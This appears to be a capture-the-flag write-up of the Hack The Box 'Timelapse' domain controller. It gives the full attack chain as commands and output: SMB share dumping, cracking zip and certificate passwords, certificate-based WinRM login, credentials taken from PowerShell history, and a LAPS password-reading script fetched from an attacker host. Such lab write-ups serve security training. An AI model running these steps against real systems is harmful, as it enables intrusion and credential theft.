Timelapse

Recon

nmap_scan.log
Open 10.129.227.113:53
Open 10.129.227.113:88
Open 10.129.227.113:135
Open 10.129.227.113:139
Open 10.129.227.113:389
Open 10.129.227.113:445
Open 10.129.227.113:464
Open 10.129.227.113:3269
Open 10.129.227.113:3268
Open 10.129.227.113:636
Open 10.129.227.113:593
Open 10.129.227.113:5986
Open 10.129.227.113:9389
Open 10.129.227.113:49667
Open 10.129.227.113:49678
Open 10.129.227.113:49677
Open 10.129.227.113:49699
Open 10.129.227.113:60129
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.227.113

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-12-08 21:43:26Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5986/tcp  open  ssl/http      syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2024-12-08T21:44:57+00:00; +8h00m08s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after:  2022-10-25T14:25:29
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49677/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         syn-ack Microsoft Windows RPC
49699/tcp open  msrpc         syn-ack Microsoft Windows RPC
60129/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 38738/tcp): CLEAN (Timeout)
|   Check 2 (port 6156/tcp): CLEAN (Timeout)
|   Check 3 (port 43455/udp): CLEAN (Timeout)
|   Check 4 (port 38076/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-12-08T21:44:16
|_  start_date: N/A
|_clock-skew: mean: 8h00m07s, deviation: 0s, median: 8h00m07s

SMB

Null session login is not available, but it allows non existent users to logon.

└─$ netexec smb 10.129.227.113 -u 'anonymous' -p ''  --shares
SMB         10.129.227.113  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB         10.129.227.113  445    DC01             [+] timelapse.htb\anonymous:
SMB         10.129.227.113  445    DC01             [*] Enumerated shares
SMB         10.129.227.113  445    DC01             Share           Permissions     Remark
SMB         10.129.227.113  445    DC01             -----           -----------     ------
SMB         10.129.227.113  445    DC01             ADMIN$                          Remote Admin
SMB         10.129.227.113  445    DC01             C$                              Default share
SMB         10.129.227.113  445    DC01             IPC$            READ            Remote IPC
SMB         10.129.227.113  445    DC01             NETLOGON                        Logon server share
SMB         10.129.227.113  445    DC01             Shares          READ
SMB         10.129.227.113  445    DC01             SYSVOL                          Logon server share

Dump the share

└─$ netexec smb 10.129.227.113 -u 'anonymous' -p '' -M spider_plus -o DOWNLOAD_FLAG=True
SPIDER_PLUS 10.129.227.113  445    DC01             [+] Saved share-file metadata to "/tmp/nxc_spider_plus/10.129.227.113.json".
└─$ mv /tmp/nxc_spider_plus/10.129.227.113/Shares/Dev/winrm_backup.zip .
└─$ unzip winrm_backup.zip -d winrm_backup
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
   skipping: legacyy_dev_auth.pfx    incorrect password

It's password protected

└─$ zip2john winrm_backup.zip > winrm_backup.hash
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
---
└─$ unzip winrm_backup.zip -d winrm_backup
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
  inflating: winrm_backup/legacyy_dev_auth.pfx
└─$ pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.hash
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
thuglegacy       (legacyy_dev_auth.pfx)

Not much from here. Since it's winrm backup we can authenticate somehow. evil-winrm allows certificate authentication, but we only have pfx

└─$ evil-winrm -h | grep cert
    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate
    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate

Extracting the certificate and keys from a .pfx file

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
└─$ openssl rsa -in legacyy_dev_auth.key -out legacyy_dev_auth.decrypted.key

WinRM

WinRM port by default is 5985, but here 5986 is open which is SSL version of WinRM. Adding -S to use SSL logs us in.

└─$ evil-winrm -i 10.129.227.113 -k legacyy_dev_auth.decrypted.key -c legacyy_dev_auth.crt
/usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:71:in `validate_required_fields`: user is a required option (RuntimeError)
└─$ evil-winrm -i 10.129.227.113 -k legacyy_dev_auth.decrypted.key -c legacyy_dev_auth.crt -S
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami /all

User Name         SID
================= ============================================
timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Development                       Group            S-1-5-21-671920749-559770252-3318990721-3101 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

User.txt

*Evil-WinRM* PS C:\Users\legacyy\Documents> cat ../Desktop/user.txt
3dc5fa1dba22385a4330ce1c13cb70b9

Privilege Escalation

Get-History and actual history shows 2 different outputs (???)

*Evil-WinRM* PS C:\Users\legacyy> Get-History
  Id CommandLine
  -- -----------
   1 Invoke-expression
   2 Invoke-expression
   3 Invoke-expression
   ...
*Evil-WinRM* PS C:\Users\legacyy> Get-Content "$ENV:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
└─$ evil-winrm -i 10.129.227.113 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /all
User Name            SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers                      Group            S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

https://exploit-notes.hdks.org/exploit/windows/active-directory/laps-pentesting/https://www.netexec.wiki/winrm-protocol/defeating-laps

netexec failed 🤔

└─$ curl -LOs https://github.com/kfosaaen/Get-LAPSPasswords/raw/refs/heads/master/Get-LAPSPasswords.ps1
└─$ serve
---
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> curl 10.10.14.113/Get-LAPSPasswords.ps1 -out laps.ps1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> .\laps.ps1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-LAPSPasswords
Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : x/4(&DEjBZ+06${2{EpZ&Sqi
Expiration : 12/13/2024 1:35:32 PM

Note: 2.70 Attribute ms-Mcs-AdmPwd

Root.txt

└─$ evil-winrm -i 10.129.227.113 -u 'administrator' -p 'x/4(&DEjBZ+06${2{EpZ&Sqi' -S
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
Cannot find path 'C:\Users\Administrator\Desktop\root.txt' because it does not exist.
*Evil-WinRM* PS C:\Users> ls -rec -fil root.txt | %{$_.FullName;cat $_.FullName}
C:\Users\TRX\Desktop\root.txt
92397df9fb849fb66e9615a704d2a2a7
PreviousSurveillanceNextTrick

Last updated